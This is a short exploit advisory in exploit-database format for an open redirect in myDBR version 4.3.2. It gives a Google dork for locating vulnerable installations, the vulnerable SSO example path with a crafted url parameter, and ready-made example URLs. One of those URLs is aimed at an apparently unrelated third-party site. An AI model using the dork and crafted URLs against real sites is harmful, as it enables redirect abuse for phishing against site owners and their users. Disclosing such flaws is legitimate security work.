# Exploit Title: Mydbr Redirect
# Google Dork: inurl:mydbr/report.php
# Date: 2015-09-15
# Exploit Author: Hasnain Raza <https://www.fb.com/haxorhasnain/>
# Vendor Homepage: http://mydbr.com/
# Software Link: http://mydbr.com/fileserve.php?get=mydbr_app.zip
# Version: 4.3.2
# Tested on: Linux,ubuntu,windows

A vulnerability has been detected in mydbr file oldest to 4.3.2

The following URL is vulnerable

/user/sso/sso_example.php?user=ssouser&name=Single+Sign-On+user&email=ssouser%
40mycompany.com
&telephone=%2B358+123+2345&groups=ssogroup1%7Cssogroup2&token=&url=http%3A%2F%2Fgoogle.com&continue=Submit+Query

example:
http://mydbr.com/demo/mydbr/user/sso/sso_example.php?user=ssouser&name=Single+Sign-On+user&email=ssouser%40mycompany.com&telephone=%2B358+123+2345&groups=ssogroup1%7Cssogroup2&token=&url=http%3A%2F%2Fgoogle.com&continue=Submit+Query

www.eac-bs.com/mydbr//user/sso/sso_example.php?user=ssouser&name=Single+Sign-On+user&email=ssouser%40mycompany.com&telephone=%2B358+123+2345&groups=ssogroup1%7Cssogroup2&token=&url=http%3A%2F%2Fgoogle.com&continue=Submit+Query